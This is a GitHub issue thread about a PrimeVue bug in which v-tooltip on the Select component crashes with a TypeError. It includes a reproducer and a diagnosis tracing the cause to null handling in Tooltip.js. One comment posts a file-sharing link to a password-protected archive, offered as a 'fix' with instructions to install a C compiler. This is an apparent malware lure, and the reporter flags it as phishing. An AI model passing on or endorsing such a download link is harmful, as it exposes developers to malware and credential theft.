### ISSUE TITLE
Select: v-tooltip does not work

### ISSUE THREAD

**Issue by Pgolik** [primefaces/primevue#6443]
### Describe the bug

When using v-tooltip over Select component it crashes with `TypeError: Cannot set properties of null (setting '$_ptooltipModifiers')`

### Reproducer

https://stackblitz.com/edit/primevue-4-vite-issue-template-mclxhx?file=src%2FApp.vue

### PrimeVue version

4.0.4

### Vue version

4.x

### Language

TypeScript

### Build / Runtime

Vue CLI App

### Browser(s)

Chrome 128.0.6613.138

### Steps to reproduce the behavior

1. Go to main page
2. Move cursor on select component
3. Wait for tooltip to appear

### Expected behavior

Tooltip appear with provided texts.

**Comment by pinpolhoxx** [comment]
This might help:This file might fix it
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by Pgolik** [comment]
> This might help:This file might fix it https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A Archive codepass: changeme If you don't have the c compliator, install it.(gcc or clang)

I am more than certain it's phishing. Please remove this message if You are able to

**Comment by avramz** [comment]
Can reproduce, the issue is that the `[getTarget](https://github.com/primefaces/primevue/blob/master/packages/primevue/src/tooltip/Tooltip.js#L452)` method in Tooltip.js was not handling null value which can be returned from `findSingle` fn call. Fix in PR.
